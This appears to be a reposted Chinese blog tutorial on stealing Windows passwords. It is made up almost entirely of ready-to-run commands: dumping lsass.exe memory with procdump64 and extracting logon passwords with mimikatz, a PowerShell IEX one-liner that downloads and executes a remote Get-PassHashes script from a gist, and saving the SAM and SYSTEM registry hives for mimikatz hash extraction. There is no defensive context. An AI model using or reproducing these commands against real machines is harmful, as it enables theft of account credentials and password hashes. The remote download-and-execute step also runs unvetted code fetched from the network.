当前位置:   article > 正文

windows密码抓取_procdump64

procdump64

procdump+mimikatz读取密码

管理员打开cmd
procdump文件根目录运行

procdump64.exe -accepteula -ma lsass.exe lsass.dmp
  • 1

将得到的lsass.dmp放到mimikatz启动的根目录下
在这里插入图片描述

mimikatz
privilege::debug
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
  • 1
  • 2
  • 3
  • 4

在这里插入图片描述

使用powershell读取密码

powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/ATpiu/d656f76a7a93209ccfec2748fb71b9b7/raw/3ea13924b32d42d737a8ba058cea24cba81f10ec/Get-PassHashes.ps1');Get-PassHashes
  • 1

在这里插入图片描述

通过SAM文件+mimikatz读取密码

导出sam和system

reg save HKLM\SYSTEM sys.hiv 
reg save HKLM\SAM sam.hiv
  • 1
  • 2

放到mimikatz根目录下
运行

lsadump::sam /system:sys.hiv /sam:sam.hiv
  • 1

在这里插入图片描述

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/繁依Fanyi0/article/detail/690278
推荐阅读
相关标签
  

闽ICP备14008679号